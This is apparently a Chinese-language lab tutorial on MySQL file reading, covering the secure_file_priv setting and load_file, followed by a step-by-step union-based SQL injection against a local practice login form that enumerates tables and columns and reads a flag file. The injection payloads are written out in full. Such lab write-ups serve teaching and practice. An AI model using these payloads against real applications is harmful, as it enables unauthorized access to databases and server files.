一、文件操作基础
show
先试试 show variables;发现显示了三百多行的系统变量:
这是数据库的目录:
mysql有多种编码方式,有数据库编码、连接时的编码、还有客户端的编码:
这里还有一个日志路径,这个日志是需要手动打开的,但是打开这个日志数据库会大很多:
这个记录的是主机的名字:
mysql端口号默认3306:
版本是5.5.53
这里记录的是机器的型号和操作系统的型号:
我们看到mysql的variables变量非常多,所以我们需要筛选一下,这个时候就可以用通配符like:
cpp
show variables like 'sec%';我们看到第二个选项secure_file_priv它的值是null,它是文件读写相关的选项:
我们用phpstudy快速的打开配置文件:
之间在末尾添加一下,后面没有任何值的,因为不限制导入导出,保存后mysql重启一下就可以生效:
现在可以看到是什么都没有,就表明mysql对导入导出不限制:
load_file
我们本地第一下看看,读完后发现是空值
本地flag的路径也是这个,为什么会是空值呢,事实上是因为我们的反斜杠\,读取目录的时候是不能用反斜杠的,得用普通的斜杠:
这样就成功读取了:
当我们把目录换到了mysql目录,我们再去读就发现读不到了,因为secure_file_priv的目录换到了mysql
目录就只能读mysql目录
我们读一下mysql目录下的文件,成功读取了,www的目录不能读取,因为我们限制了读取目录:
二、Load_file读文件
常规union联合查询注入
cpp
测试注入点
username=admin&password=a
闭合
username=admin' and 1=1%23&password=a
测试列数
username=admin' order by 3%23&password=a
测试回显位
username=a' union select 1,2,3%23&password=a
查库名
username=a' union select 1,database(),3%23&password=a
查表名
username=a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23&password=a
查列名
username=a' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23&password=a
查flag #输出了路径C:/phpstudy_pro/WWW/7/6/flag.txt
username=a' union select 1,flag,3 from flag%23&password=a
读文件
username=a' union select 1,load_file('C:/phpstudy_pro/WWW/7/6/flag.txt'),3 %23&password=a总结
load_file等读文件的函数受到secure-file-priv 选项的限制,能不能使用load_file进行注入,要看这个选项的配置
文件路径不能使用反斜线\,要使用斜线/